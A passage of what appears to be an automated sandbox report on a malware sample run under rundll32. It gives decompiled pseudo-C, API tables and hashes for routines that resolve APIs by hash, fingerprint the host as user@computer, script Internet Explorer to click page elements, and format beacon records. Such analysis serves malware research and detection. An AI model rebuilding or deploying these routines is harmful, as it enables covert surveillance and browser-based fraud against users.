                									} else {
                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                										_t44 = E04B92C68(_t54, _a8);
                										_v8 = _t44;
                										if(_t44 != 0) {
                											goto L8;
                										} else {
                											 *_a12 = _t54;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}

                APIs
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B970A7,?,?,?,?,00000000,00000000), ref: 04B97447
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B97469
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B9747F
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B97495
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B974AB
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B974C1
                  • Part of subcall function 04B92C68: memset.NTDLL ref: 04B92CE7
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateHandleHeapModulememset
                • String ID:
                • API String ID: 1886625739-0
                • Opcode ID: 925fa0ff5ca64ed2134ef798f5672e5584a45fef040a29a5a3c671aa62294158
                • Instruction ID: 1dafda0902d1737d5836f3398272ab42e098f664143b77decd3f55599dbf3f16
                • Opcode Fuzzy Hash: 925fa0ff5ca64ed2134ef798f5672e5584a45fef040a29a5a3c671aa62294158
                • Instruction Fuzzy Hash: 60215AB061471AEFDB20DF69D984E5ABBECEF08754B014166E504C7211EB78FE08CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E04B94467(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                				signed int _v8;
                				char _v12;
                				signed int* _v16;
                				char _v284;
                				void* __esi;
                				char* _t59;
                				intOrPtr* _t60;
                				intOrPtr _t64;
                				char _t65;
                				intOrPtr _t68;
                				intOrPtr _t69;
                				intOrPtr _t71;
                				void* _t73;
                				signed int _t81;
                				void* _t91;
                				void* _t92;
                				char _t98;
                				signed int* _t100;
                				intOrPtr* _t101;
                				void* _t102;
                
                				_t92 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_t98 = _a16;
                				if(_t98 == 0) {
                					__imp__( &_v284,  *0x4b9a3dc);
                					_t91 = 0x80000002;
                					L6:
                					_t59 = E04B92EAF( &_v284,  &_v284);
                					_a8 = _t59;
                					if(_t59 == 0) {
                						_v8 = 8;
                						L29:
                						_t60 = _a20;
                						if(_t60 != 0) {
                							 *_t60 =  *_t60 + 1;
                						}
                						return _v8;
                					}
                					_t101 = _a24;
                					if(E04B95F6A(_t92, _t97, _t101, _t91, _t59) != 0) {
                						L27:
                						E04B94130(_a8);
                						goto L29;
                					}
                					_t64 =  *0x4b9a318; // 0x5109d00
                					_t16 = _t64 + 0xc; // 0x5109e22
                					_t65 = E04B92EAF(_t64,  *_t16);
                					_a24 = _t65;
                					if(_t65 == 0) {
                						L14:
                						_t29 = _t101 + 0x14; // 0x102
                						_t33 = _t101 + 0x10; // 0x3d04b990
                						if(E04B92331(_t97,  *_t33, _t91, _a8,  *0x4b9a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                							_t68 =  *0x4b9a348; // 0x56d5a8
                							if(_t98 == 0) {
                								_t35 = _t68 + 0x4b9ba3e; // 0x4d4c4b48
                								_t69 = _t35;
                							} else {
                								_t34 = _t68 + 0x4b9ba39; // 0x55434b48
                								_t69 = _t34;
                							}
                							if(E04B96246(_t69,  *0x4b9a3d4,  *0x4b9a3d8,  &_a24,  &_a16) == 0) {
                								if(_t98 == 0) {
                									_t71 =  *0x4b9a348; // 0x56d5a8
                									_t44 = _t71 + 0x4b9b842; // 0x74666f53
                									_t73 = E04B92EAF(_t44, _t44);
                									_t99 = _t73;
                									if(_t73 == 0) {
                										_v8 = 8;
                									} else {
                										_t47 = _t101 + 0x10; // 0x3d04b990
                										E04B94AA9( *_t47, _t91, _a8,  *0x4b9a3d8, _a24);
                										_t49 = _t101 + 0x10; // 0x3d04b990
                										E04B94AA9( *_t49, _t91, _t99,  *0x4b9a3d0, _a16);
                										E04B94130(_t99);
                									}
                								} else {
                									_t40 = _t101 + 0x10; // 0x3d04b990
                									E04B94AA9( *_t40, _t91, _a8,  *0x4b9a3d8, _a24);
                									_t43 = _t101 + 0x10; // 0x3d04b990
                									E04B94AA9( *_t43, _t91, _a8,  *0x4b9a3d0, _a16);
                								}
                								if( *_t101 != 0) {
                									E04B94130(_a24);
                								} else {
                									 *_t101 = _a16;
                								}
                							}
                						}
                						goto L27;
                					}
                					_t21 = _t101 + 0x10; // 0x3d04b990
                					_t81 = E04B92A10( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                					if(_t81 == 0) {
                						_t100 = _v16;
                						if(_v12 == 0x28) {
                							 *_t100 =  *_t100 & _t81;
                							_t26 = _t101 + 0x10; // 0x3d04b990
                							E04B92331(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                						}
                						E04B94130(_t100);
                						_t98 = _a16;
                					}
                					E04B94130(_a24);
                					goto L14;
                				}
                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                					goto L29;
                				} else {
                					_t97 = _a8;
                					E04B97B55(_t98, _a8,  &_v284);
                					__imp__(_t102 + _t98 - 0x117,  *0x4b9a3dc);
                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                					_t91 = 0x80000003;
                					goto L6;
                				}
                			}

                APIs
                • StrChrA.SHLWAPI(04B9175D,0000005F,00000000,00000000,00000104), ref: 04B9449A
                • lstrcpy.KERNEL32(?,?), ref: 04B944C7
                  • Part of subcall function 04B92EAF: lstrlen.KERNEL32(?,00000000,05109D00,00000000,04B977C5,05109F23,69B25F44,?,?,?,?,69B25F44,00000005,04B9A00C,4D283A53,?), ref: 04B92EB6
                  • Part of subcall function 04B92EAF: mbstowcs.NTDLL ref: 04B92EDF
                  • Part of subcall function 04B92EAF: memset.NTDLL ref: 04B92EF1
                  • Part of subcall function 04B94AA9: lstrlenW.KERNEL32(?,?,?,04B94630,3D04B990,80000002,04B9175D,04B925E4,74666F53,4D4C4B48,04B925E4,?,3D04B990,80000002,04B9175D,?), ref: 04B94ACE
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • lstrcpy.KERNEL32(?,00000000), ref: 04B944E9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: 0e5702a371555ab8d059464e4d5d3ade75df4b16406b435449d3ff729ccfe606
                • Instruction ID: 2c02cb74811f43e41f861afe8fe919f8933dc13070bf3ad18d0b426691b22492
                • Opcode Fuzzy Hash: 0e5702a371555ab8d059464e4d5d3ade75df4b16406b435449d3ff729ccfe606
                • Instruction Fuzzy Hash: 8D511A7150820AEFEF119FA0DD40EAA7BFAEF48354F0085A5F91596120DB35ED26AF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			/* Drives an Internet Explorer document through COM: fetches the browser's document,
                			 * asks it for every element with a given tag name, and calls click() on the element
                			 * whose id equals a target string. The vtable slots used below are consistent with
                			 * IWebBrowser2::get_Document (0x48), IHTMLDocument3::getElementsByTagName (0xbc),
                			 * IHTMLElementCollection::get_length (0x24) and item (0x2c), IHTMLElement::get_id (0x34)
                			 * and IHTMLElement::click (0x114); the first DWORDs of the two IIDs handed to
                			 * QueryInterface, 0x3050f485 and 0x3050f1ff, are those of IID_IHTMLDocument3 and
                			 * IID_IHTMLElement. Returns an HRESULT. (Slot names are the editor's reading of the
                			 * offsets; the dump itself carries no symbols.) */
                			E04B92AD6(intOrPtr* __eax) {
                				void* _v8;
                				WCHAR* _v12;
                				void* _v16;
                				char _v20;
                				void* _v24;
                				intOrPtr _v28;
                				void* _v32;
                				intOrPtr _v40;
                				short _v48;
                				intOrPtr _v56;
                				short _v64;
                				intOrPtr* _t54;
                				intOrPtr* _t56;
                				intOrPtr _t57;
                				intOrPtr* _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				short _t67;
                				intOrPtr* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t75;
                				intOrPtr* _t77;
                				intOrPtr _t79;
                				intOrPtr* _t83;
                				intOrPtr* _t87;
                				intOrPtr _t103;
                				intOrPtr _t109;
                				void* _t118;
                				void* _t122;
                				void* _t123;
                				intOrPtr _t130;
                
                				_t123 = _t122 - 0x3c;
                				_push( &_v8);
                				_push(__eax);
                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                				if(_t118 >= 0) {
                					_t54 = _v8;
                					_t103 =  *0x4b9a348; // 0x56d5a8
                					_t5 = _t103 + 0x4b9b038; // 0x3050f485
                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                					_t56 = _v8;
                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                					if(_t118 >= 0) {
                						__imp__#2(0x4b99298); // OLEAUT32 ordinal 2 = SysAllocString: BSTR for the tag name
                						_v28 = _t57;
                						if(_t57 == 0) {
                							_t118 = 0x8007000e; // E_OUTOFMEMORY: SysAllocString failed
                						} else {
                							_t60 = _v32;
                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                							_t87 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString
                							_t118 = _t61;
                							if(_t118 >= 0) {
                								_t63 = _v24;
                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                								if(_t118 >= 0) {
                									_t130 = _v20;
                									if(_t130 != 0) {
                										// two VARIANTs with vt = 3 (VT_I4) for IHTMLElementCollection::item():
                										// a constant 0 and the loop counter _v40 (copied onto the stack by the movsd runs)
                										_t67 = 3;
                										_v64 = _t67;
                										_v48 = _t67;
                										_v56 = 0;
                										_v40 = 0;
                										if(_t130 > 0) {
                											while(1) {
                												_t68 = _v24;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t123 = _t123;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                												if(_t118 < 0) {
                													goto L16;
                												}
                												_t70 = _v8;
                												_t109 =  *0x4b9a348; // 0x56d5a8
                												_t28 = _t109 + 0x4b9b0bc; // 0x3050f1ff
                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                												if(_t118 >= 0) {
                													_t75 = _v16;
                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                													if(_t118 >= 0 && _v12 != 0) {
                														_t79 =  *0x4b9a348; // 0x56d5a8
                														_t33 = _t79 + 0x4b9b078; // 0x76006f
                														// element id equals the target string: IHTMLElement::click() on it
                														if(lstrcmpW(_v12, _t33) == 0) {
                															_t83 = _v16;
                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                														}
                														 *_t87(_v12);
                													}
                													_t77 = _v16;
                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                												}
                												_t72 = _v8;
                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                												_v40 = _v40 + 1;
                												if(_v40 < _v20) {
                													continue;
                												}
                												goto L16;
                											}
                										}
                									}
                								}
                								L16:
                								_t65 = _v24;
                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                							}
                							 *_t87(_v28);
                						}
                						_t58 = _v32;
                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                					}
                				}
                				return _t118;
                			}
                Instruction addresses for E04B92AD6: 0x04b92adb - 0x04b92c67

                APIs
                • SysAllocString.OLEAUT32(04B99298), ref: 04B92B26
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04B92C07
                • SysFreeString.OLEAUT32(00000000), ref: 04B92C20
                • SysFreeString.OLEAUT32(?), ref: 04B92C4F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID: het
                • API String ID: 1885612795-578400553
                • Opcode ID: 2194aad95b8c586f4683d00fe87b4b245a9e6055d0785badc86ee09a2b8e6b05
                • Instruction ID: d47fb04ddb30bf48d95f62524280b7985542c9248274a4e9feaed6501626e906
                • Opcode Fuzzy Hash: 2194aad95b8c586f4683d00fe87b4b245a9e6055d0785badc86ee09a2b8e6b05
                • Instruction Fuzzy Hash: 61513C75D00509EFCF04DFA8C9889AEB7B9EF88701B1449D9E915EB220D731AE41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			/* Replaces the buffer pointer at the head of the global structure referenced by
                			 * 0x4b9a3cc. Holds the critical section embedded at offset 0x40 of that structure
                			 * (the unnamed __imp__ calls are RtlEnterCriticalSection / RtlLeaveCriticalSection per
                			 * the API list), spins in 10 ms sleeps until the DWORD at offset 0x58 reads zero,
                			 * frees the previous buffer unless it is the built-in default at 0x4b9b827, and
                			 * stores the caller-supplied pointer _v0. */
                			E04B94408() {
                				void* _v0;
                				void** _t3;
                				void** _t5;
                				void** _t7;
                				void** _t8;
                				void* _t10;
                
                				_t3 =  *0x4b9a3cc; // 0x5109600
                				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection (structure offset 0x40)
                				while(1) {
                					_t5 =  *0x4b9a3cc; // 0x5109600
                					_t1 =  &(_t5[0x16]); // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t7 =  *0x4b9a3cc; // 0x5109600
                				_t10 =  *_t7;
                				if(_t10 != 0 && _t10 != 0x4b9b827) {
                					HeapFree( *0x4b9a2d8, 0, _t10);
                					_t7 =  *0x4b9a3cc; // 0x5109600
                				}
                				 *_t7 = _v0;
                				_t8 =  &(_t7[0x10]);
                				__imp__(_t8); // RtlLeaveCriticalSection
                				return _t8;
                			}
                Instruction addresses for E04B94408: 0x04b94408 - 0x04b94464

                APIs
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B94411
                • Sleep.KERNEL32(0000000A), ref: 04B9441B
                • HeapFree.KERNEL32(00000000), ref: 04B94449
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B9445E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Uet
                • API String ID: 58946197-2766386878
                • Opcode ID: a3541bfb100252707cea0b51c3fb9d2f81e30148082babe6a3ad396a13374cdb
                • Instruction ID: b7afd72e5e35563c7aad62a23fad520aa58318dd944e0a2528fd70c0c019a26b
                • Opcode Fuzzy Hash: a3541bfb100252707cea0b51c3fb9d2f81e30148082babe6a3ad396a13374cdb
                • Instruction Fuzzy Hash: 2BF0DAB4208241ABEF188B69EA89B1537F4EB48305B04806AE912D7390CE38AC05DA30
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			/* Builds "<user name>@<computer name>" and returns it as a UTF-8 string on the process
                			 * heap (0 on any failure). GetUserNameW and GetComputerNameW are each called twice:
                			 * once with a NULL buffer to learn the required length, then to fill the buffer
                			 * obtained from E04B96601, which is released with E04B94130 on the error paths. The
                			 * 0x40 written over the user name's terminator is '@'; 0xfde9 is CP_UTF8. */
                			E04B96173() {
                				long _v8;
                				long _v12;
                				int _v16;
                				long _t39;
                				long _t43;
                				signed int _t47;
                				short _t51;
                				signed int _t52;
                				int _t56;
                				int _t57;
                				char* _t64;
                				short* _t67;
                
                				_v16 = 0;
                				_v8 = 0;
                				GetUserNameW(0,  &_v8);
                				_t39 = _v8;
                				if(_t39 != 0) {
                					_v12 = _t39;
                					_v8 = 0;
                					GetComputerNameW(0,  &_v8);
                					_t43 = _v8;
                					if(_t43 != 0) {
                						_t11 = _t43 + 2; // 0x76b5c742
                						_v12 = _v12 + _t11;
                						_t64 = E04B96601(_v12 + _t11 << 2);
                						if(_t64 != 0) {
                							_t47 = _v12;
                							_t67 = _t64 + _t47 * 2;
                							_v8 = _t47;
                							if(GetUserNameW(_t67,  &_v8) == 0) {
                								L7:
                								E04B94130(_t64);
                							} else {
                								_t51 = 0x40; // '@', written over the terminating NUL of the user name
                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                								_t52 = _v8;
                								_v12 = _v12 - _t52;
                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                									goto L7;
                								} else {
                									_t56 = _v12 + _v8;
                									_t31 = _t56 + 2; // 0x4b96d10
                									_v12 = _t56;
                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0); // 0xfde9 = CP_UTF8
                									_v8 = _t57;
                									if(_t57 == 0) {
                										goto L7;
                									} else {
                										_t64[_t57] = 0;
                										_v16 = _t64;
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v16;
                			}
                Instruction addresses for E04B96173: 0x04b96181 - 0x04b96245

                APIs
                • GetUserNameW.ADVAPI32(00000000,04B96D0E), ref: 04B96187
                • GetComputerNameW.KERNEL32(00000000,04B96D0E), ref: 04B961A3
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetUserNameW.ADVAPI32(00000000,04B96D0E), ref: 04B961DD
                • GetComputerNameW.KERNEL32(04B96D0E,76B5C740), ref: 04B96200
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04B96D0E,00000000,04B96D10,00000000,00000000,?,76B5C740,04B96D0E), ref: 04B96223
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: 02df1f4931177debfafb60e58ea463df8cfd975f95b885083fa095c23218c676
                • Instruction ID: 5d8eccba0f9d30dfabb29dcba1d3d263ff294611f54cb299d04a23eca7b23103
                • Opcode Fuzzy Hash: 02df1f4931177debfafb60e58ea463df8cfd975f95b885083fa095c23218c676
                • Instruction Fuzzy Hash: 7B21A7B6900108FFDF15DFE5D985CEEBBB8EF48744B5044AAE501E7240EB34AE459B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			/* Formats a record with wsprintfA from the string at 0x4b9a348+0x4b9b67a, whose first
                			 * four bytes are "size" (0x657a6973), then hands it to one of two back ends chosen by
                			 * the counter at 0x4b9a2ec: below 5 it allocates an 0x800-byte heap buffer and calls
                			 * E04B911DD (which stamps GetTickCount and formats further fields); at 5 or above it
                			 * calls E04B96BEF instead. The counter is incremented on every failure and reset to
                			 * zero on success only while it is still below 5, so after five failures the switch
                			 * to E04B96BEF is permanent. Returns 8 (ERROR_NOT_ENOUGH_MEMORY) if the heap
                			 * allocation fails. */
                			E04B94315(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                				void* _v8;
                				char _v48;
                				void* __edi;
                				intOrPtr _t22;
                				intOrPtr _t30;
                				intOrPtr _t34;
                				intOrPtr* _t42;
                				void* _t43;
                				void* _t46;
                				intOrPtr* _t48;
                				void* _t49;
                				intOrPtr _t51;
                
                				_t42 = _a16;
                				_t48 = __eax;
                				_t22 =  *0x4b9a348; // 0x56d5a8
                				_t2 = _t22 + 0x4b9b67a; // 0x657a6973
                				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                				if( *0x4b9a2ec >= 5) {
                					_t30 = E04B96BEF(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                					L5:
                					_a4 = _t30;
                					L6:
                					if(_a4 != 0) {
                						L9:
                						 *0x4b9a2ec =  *0x4b9a2ec + 1;
                						L10:
                						return _a4;
                					}
                					_t50 = _a16;
                					 *_t48 = _a16;
                					_t49 = _v8;
                					 *_t42 = E04B96821(_t50, _t49);
                					_t34 = E04B9722B(_t49, _t50);
                					if(_t34 != 0) {
                						 *_a8 = _t49;
                						 *_a12 = _t34;
                						if( *0x4b9a2ec < 5) {
                							 *0x4b9a2ec =  *0x4b9a2ec & 0x00000000;
                						}
                						goto L10;
                					}
                					_a4 = 0xbf;
                					E04B9554C();
                					HeapFree( *0x4b9a2d8, 0, _t49);
                					goto L9;
                				}
                				_t51 =  *0x4b9a3e0; // 0x5109cf0
                				if(RtlAllocateHeap( *0x4b9a2d8, 0, 0x800) == 0) {
                					_a4 = 8;
                					goto L6;
                				}
                				_t30 = E04B911DD(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                				goto L5;
                			}
                Instruction addresses for E04B94315: 0x04b9431c - 0x04b943ff

                APIs
                • wsprintfA.USER32 ref: 04B94337
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B9435C
                  • Part of subcall function 04B911DD: GetTickCount.KERNEL32 ref: 04B911F4
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B91241
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B9125E
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B91280
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B912A7
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B912C8
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B912F3
                  • Part of subcall function 04B911DD: HeapFree.KERNEL32(00000000,?), ref: 04B91306
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04B943D6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$AllocateCountTick
                • String ID: Uet
                • API String ID: 1307794992-2766386878
                • Opcode ID: dfd50f8df4507e77cb516376b062410d0604afb1062dd5ee3f5941d3b71d0b73
                • Instruction ID: 9d639c21caf679f6ab1e0ae860fd60d624cb1df34d35092fd4cf553446fcdc8f
                • Opcode Fuzzy Hash: dfd50f8df4507e77cb516376b062410d0604afb1062dd5ee3f5941d3b71d0b73
                • Instruction Fuzzy Hash: 53312876604208EBDF01DFA4D984A9A7BFCFB48354F208076F901A7250EB34AE55DBB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(?), ref: 04B9729D
                • SysFreeString.OLEAUT32(00000000), ref: 04B97382
                  • Part of subcall function 04B92AD6: SysAllocString.OLEAUT32(04B99298), ref: 04B92B26
                • SafeArrayDestroy.OLEAUT32(00000000), ref: 04B973D5
                • SysFreeString.OLEAUT32(00000000), ref: 04B973E4
                  • Part of subcall function 04B92960: Sleep.KERNEL32(000001F4), ref: 04B929A8
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: fa5535032ba767e5396652493e5e1904719d24365e1dae2dfa722266a4dfea68
                • Instruction ID: 95b9cc76938eb2cd6c290093d80ea4b65401f868e373ad4160d1dc8962505759
                • Opcode Fuzzy Hash: fa5535032ba767e5396652493e5e1904719d24365e1dae2dfa722266a4dfea68
                • Instruction Fuzzy Hash: 6E514E75510609EFDB01CFA8C844A9EB7F5FF88740B1488B9E915DB210EB35ED06CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			/* Multi-precision unsigned division with 32-bit limbs, least significant limb first:
                			 * divides the __eax-limb number in _a8 by the number in _a12 (E04B9180C appears to
                			 * return its significant limb count; zero makes the routine return 0 at once).
                			 * Schoolbook long division: the loop over _t56 measures the bit length of the
                			 * divisor's top limb, giving the shift that normalises it; E04B927F8 shifts both
                			 * operands into the stack buffers _v428 and _v156; for each quotient position the
                			 * digit is estimated as (u[j+n]*2^32 + u[j+n-1]) / (v[n-1]+1) with _allmul/_aulldiv
                			 * (clamped to 0xffffffff, or taken as u[j+n] when v[n-1] is 0xffffffff), E04B97A44
                			 * multiply-subtracts it, and the under-estimate is raised by repeated subtraction
                			 * (E04B96A0A) until the partial remainder compares below the divisor (E04B92D79).
                			 * Quotient digits go to the global array at 0x4b9a1d0; E04B97898 shifts the
                			 * remainder back into _a4, and both work buffers are wiped with memset on exit. */
                			E04B9755C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				void _v156;
                				void _v428;
                				void* _t55;
                				unsigned int _t56;
                				signed int _t66;
                				signed int _t74;
                				void* _t76;
                				signed int _t79;
                				void* _t81;
                				void* _t92;
                				void* _t96;
                				signed int* _t99;
                				signed int _t101;
                				signed int _t103;
                				void* _t107;
                
                				_t92 = _a12;
                				_t101 = __eax;
                				_t55 = E04B9180C(_a16, _t92);
                				_t79 = _t55;
                				if(_t79 == 0) {
                					L18:
                					return _t55;
                				}
                				_t56 =  *(_t92 + _t79 * 4 - 4);
                				_t81 = 0;
                				_t96 = 0x20;
                				if(_t56 == 0) {
                					L4:
                					_t97 = _t96 - _t81;
                					_v12 = _t96 - _t81;
                					E04B9468A(_t79,  &_v428);
                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04B927F8(_t101,  &_v428, _a8, _t96 - _t81);
                					E04B927F8(_t79,  &_v156, _a12, _t97);
                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
